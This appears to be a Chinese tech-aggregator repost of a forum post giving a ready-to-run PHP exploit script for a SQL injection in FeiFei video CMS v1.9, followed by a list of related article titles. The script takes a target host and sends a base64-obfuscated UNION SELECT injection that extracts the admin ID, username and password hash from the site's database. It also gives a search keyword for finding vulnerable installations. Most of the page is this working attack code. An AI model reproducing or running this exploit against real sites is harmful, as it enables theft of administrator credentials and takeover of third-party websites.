飞飞php影视系统漏洞,飞飞影视系统PHP版 v1.9 injection exploit漏洞预警 -电脑资料...
文章作者:honglousy
昨天整的 论坛旁站上的程序,发现用的人还真不少,
简单的写了个exp。无聊之作...
/**
* 飞飞影视管理系统 SQL injection
* 飞飞影视系统PHP版 v1.9 injection exploit
* by:www.08sec.com fans
* keyword "Powered bywww.ff84.com"
*/
error_reporting(E_ERROR);
set_time_limit(0);
if ($argc<3) {
print_r('
------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to ff84cms
Example:
php '.$argv[0].' localhost /
-------------------------------------------------------
');
die;
}
$host=$argv[1];
$path=$argv[2];
$html='';
$cookie="";
$agent=" User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1";
$content ="";
$data = "POST /?s=vod-read-id-1".base64_decode('JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNixjb25jYXQoMHg0MCxhZG1pbl9pZCwweDQwLGFkbWluX25hbWUsMHg0MCxhZG1pbl9wd2QsMHg0MCksMjgsMjklMjBmcm9tJTIwcHBfYWRtaW4tLQ==')."html HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
//$data .="Cookie: ".$cookie."\r\n";
$data .= "User-Agent: ".$agent. "\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
Sendpack($data);
if (!eregi("Tpl",$html)){
// echo $packet."\r\n";
// echo $html."\r\n";
die("Exploit failed...");
}else{
$pattern="/@(.*)@/i";
preg_match($pattern,$html,$pg);
echo "$pg[1]\r\n\r\n";
echo "\r\nExploit succeeded...\r\n";
}
Function sendpack ($packet)
{
global $host, $html;
$ock=fsockopen(gethostbyname($host),'80');
if (!$ock) {
echo 'No response from '.$host; die;
}
fputs($ock,$packet);
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
fclose($ock);
}
飞飞php影视系统漏洞,飞飞影视系统PHP版 v1.9 injection exploit漏洞预警 -电脑资料...相关推荐
- 易想团购 注入 user.php,易想团购系统通杀SQL注入漏洞分析及利用漏洞预警 -电脑资料...
刚打开红黑看到J8基友写的一个{易想团购系统 最新版 通杀}的文章,看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序, 找到get_client_ip()函数 ...
- 服务器系统刻录,Windows XP操作系统中光盘刻录实战服务器教程 -电脑资料
window 早就知道Win XP增加了对刻录机的支持,也就是无需任何第三方软件直接在WinXP中就能完成刻录的工作,但是一直没有机会测试, 正确的完成硬件的安装,启动WinXP后并没有出现什么找到新 ...
- 虚拟机服务器 资料安全,绝密:三步教你轻松窃取VMware虚拟机及其数据漏洞预警 -电脑资料...
是否记得曾经虚拟化过的邮件服务器或者薪酬支付系统?如果拥有访问虚拟化工作环境管理员权限,就可以轻松地进入该虚拟化工作环境,并且窃取所有的数据,而又不会留下任何痕迹, 虚拟化技术可以提供很多物理服务器无 ...
- php sql漏洞修复,PHPNet = 1.8 (ler.php) SQL注射及修复漏洞预警 -电脑资料
标题: PHPNet <= 1.8 (ler.php) SQL Injection 作者 WhiteCollarGroup 开发者: http://www.phpnet.com.br/ 下载地址 ...
- 飞飞影视php 漏洞,飞飞影视SQL injection exploit[转]
/** * 飞飞影视管理系统 SQL injection * 飞飞影视系统PHP版 v1.9 injection exploit * by:www.08sec.com fans * keyword & ...
- 0day安全:软件漏洞分析技术(第2版)
0day安全:软件漏洞分析技术(第2版) 基本信息 作者:王清 张东辉 周浩 王继刚 赵双 丛书名:安全技术大系 出版社:电子工业出版社 ISBN:9787121133961 上架时间 ...
- 飞飞php影视系统源码怎么改,飞飞cms影视系统安装说明 飞飞影视系统建站流程...
1. 将文件夹下所有的文件上传至您的网站空间 2. 如果您的主机为 window 操作系统,请将以下文件夹的IIS用户加上写入权限 3. 如果您的主机为 linux 操作系统,请设置如下文件夹权限为 ...
- 飞飞cms添加广告html,飞飞cms影视系统 安装说明飞飞影视系统 建站流程
飞飞影视系统 安装说明 --------------------------------------- 1. 将文件夹下所有的文件上传至您的网站空间 2. 如果您的主机为 window 操作系统,请 ...
- 飞飞cms添加广告html,飞飞影视cms-飞飞cms免费影视站程序
飞飞影视导航系统又名飞飞CMS,程序100%完全开源,无任何加密代码.无广告.无后门.飞飞影视导航系统采用PHP+Mysql技术开发,可以在windows和Linux系统平台上运行.飞飞影视导航系统是 ...
最新文章
- 这是人家大一新生开发的工具!网友:我好菜
- 怎么检查python是否安装成功-如何在Docker中检查是否安装了python包?
- ITK:从灰度图像计算直方图
- 动态规划 53:Maximum Subarray,152:Maximum Subarray,266. Palindrome Permutation 回文全排列...
- windows版本的clion软件除了使用wsl配置Ubuntu子系统外,还可以使用MinGW-w64来配置gcc和g++
- 在计算机网络中为了保证正确传输,计算机网络试卷B
- pic单片机选型手册_STM32F103单片机RTC及其晶振相关的官方资料整理
- (转)json+flexgrid+jbox组合运用页面刷新jsp
- oracle禁止访问监听,关于ORACLE数据库监听自动停止解决一例
- PVE系列教程(七)、安装iKuai软路由
- chrome浏览器无法打开网页怎么办
- pytorch-psenet实现 并训练自己的数据集
- 前端获取微信头像 base64 数据的踩坑实践
- 全国计算机二级考试web程序,2018年全国计算机二级web程序考试考什么内容
- 12、Kanzi插件——创建Kanzi Engine插件的方法
- TMS320F28034PNT 德州TI 具有 60MHz 频率、128KB 闪存的 C2000™ 32 位 MCU
- 第二季:9.生产环境服务器变慢,诊断思路和性能评估谈谈?【Java面试题】
- 编码 unicode 及其在 javascript 中的使用
- 【优化系列】汇编优化技术(九):WebAssembly(wasm)平台SIMD优化
- xd卡数据丢失原因和三种数据恢复方法介绍